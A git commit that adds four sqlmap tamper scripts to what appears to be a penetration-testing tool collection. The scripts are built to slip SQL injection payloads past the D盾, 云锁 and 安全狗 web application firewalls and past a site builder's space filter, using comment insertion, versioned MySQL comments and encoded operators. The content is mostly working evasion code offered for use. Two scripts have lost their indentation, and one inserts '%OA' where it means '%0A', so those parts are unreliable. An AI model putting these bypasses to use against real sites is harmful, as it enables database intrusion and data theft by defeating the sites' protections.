add sqlmap bypass D盾/云锁/安全狗/空格替换换行 tamper

2025-08-13 03:17:26 +00:00 · 2019-11-11 21:00:31 +08:00 · 2019-11-11 21:00:31 +08:00 · c2caaba5bc
commit c2caaba5bc
parent 8d87185753
5 changed files with 148 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -122,6 +122,10 @@
 - [crt.sh证书/域名收集](./tools/crt.sh证书收集.py)
 - [TP漏洞集合利用工具py3版本-来自奇安信大佬Lucifer1993](https://github.com/Mr-xn/TPscan)
 - [Python2编写的struts2漏洞全版本检测和利用工具-来自奇安信大佬Lucifer1993](https://github.com/Mr-xn/struts-scan)
+- [sqlmap_bypass_D盾_tamper](./tools/sqlmap_bypass_D盾_tamper.py)
+- [sqlmap_bypass_安全狗_tamper](./tools/sqlmap_bypass_安全狗_tamper.py)
+- [sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper](./tools/sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper.py)
+- [sqlmap_bypass_云锁_tamper](./tools/sqlmap_bypass_云锁_tamper.py)

 ## 说明

--- a/tools/sqlmap_bypass_D盾_tamper.py
+++ b/tools/sqlmap_bypass_D盾_tamper.py
@ -0,0 +1,34 @@
+# coding=UTF-8
+# Desc: sqlmap_bypass_D盾_tamper
+
+from lib.core.enums import PRIORITY
+__priority__ = PRIORITY.LOW
+
+
+def dependencies():
+    pass
+
+
+def tamper(payload, **kwargs):
+    """
+            BYPASS Ddun
+    """
+    retVal = payload
+    if payload:
+        retVal = ""
+        quote, doublequote, firstspace = False, False, False
+        for i in xrange(len(payload)):
+            if not firstspace:
+                if payload[i].isspace():
+                    firstspace = True
+                    retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"
+                    continue
+            elif payload[i] == '\'':
+                quote = not quote
+            elif payload[i] == '"':
+                doublequote = not doublequote
+            elif payload[i] == " " and not doublequote and not quote:
+                retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"
+                continue
+            retVal += payload[i]
+    return retVal
--- a/tools/sqlmap_bypass_云锁_tamper.py
+++ b/tools/sqlmap_bypass_云锁_tamper.py
@ -0,0 +1,27 @@
+# coding=UTF-8
+# Desc: sqlmap bypass 云锁 tamper
+"""
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+import re
+
+from lib.core.data import kb
+from lib.core.enums import PRIORITY
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
+__priority__ = PRIORITY.LOW
+
+
+def dependencies():
+    pass
+
+
+def tamper(payload, **kwargs):
+    payload = payload.replace('ORDER', '/*!00000order*/')
+    payload = payload.replace('ALL SELECT', '/*!00000all*/ /*!00000select')
+    payload = payload.replace('CONCAT(', "CONCAT/**/(")
+    payload = payload.replace("--", " */--")
+    payload = payload.replace("AND", "%26%26")
+    return payload
--- a/tools/sqlmap_bypass_安全狗_tamper.py
+++ b/tools/sqlmap_bypass_安全狗_tamper.py
@ -0,0 +1,24 @@
+# coding=UTF-8 
+# Desc: sqlmap_bypass_安全狗_tamper 
+
+from lib.core.enums import PRIORITY
+from lib.core.settings import UNICODE_ENCODING
+__priority__ = PRIORITY.LOW
+def dependencies():
+pass
+def tamper(payload, **kwargs):
+
+if payload:
+payload=payload.replace(" ","/*!*/")
+payload=payload.replace("=","/*!*/=/*!*/")
+payload=payload.replace("AND","/*!*/AND/*!*/")
+payload=payload.replace("UNION","union/*!88888cas*/")
+payload=payload.replace("#","/*!*/#")
+payload=payload.replace("USER()","USER/*!()*/")
+payload=payload.replace("DATABASE()","DATABASE/*!()*/")
+payload=payload.replace("--","/*!*/--")
+payload=payload.replace("SELECT","/*!88888cas*/select")
+payload=payload.replace("FROM","/*!99999c*//*!99999c*/from")
+print payload
+
+return payload
--- a/tools/sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper.py
+++ b/tools/sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper.py
@ -0,0 +1,59 @@
+# coding=UTF-8 
+# Desc: sqlmap_bypass_某企业建站程序过滤_tamper 
+
+"""
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOW
+
+def dependencies():
+pass
+
+def tamper(payload, **kwargs):
+"""
+把空格替换成换行符：%0A
+Replaces space character (' ') with comments '%0A'
+
+Tested against:
+* Microsoft SQL Server 2005
+* MySQL 4, 5.0 and 5.5
+* Oracle 10g
+* PostgreSQL 8.3, 8.4, 9.0
+
+Notes:
+* Useful to bypass weak and bespoke web application firewalls
+
+>>> tamper('SELECT id FROM users')
+'SELECT%0Aid%0AFROM%0Ausers'
+"""
+
+retVal = payload
+
+if payload:
+retVal = ""
+quote, doublequote, firstspace = False, False, False
+
+for i in xrange(len(payload)):
+if not firstspace:
+if payload[i].isspace():
+firstspace = True
+retVal += "/%OA/"
+continue
+
+elif payload[i] == '\'':
+quote = not quote
+
+elif payload[i] == '"':
+doublequote = not doublequote
+
+elif payload[i] == " " and not doublequote and not quote:
+retVal += "/%0A/"
+continue
+
+retVal += payload[i]
+
+return retVal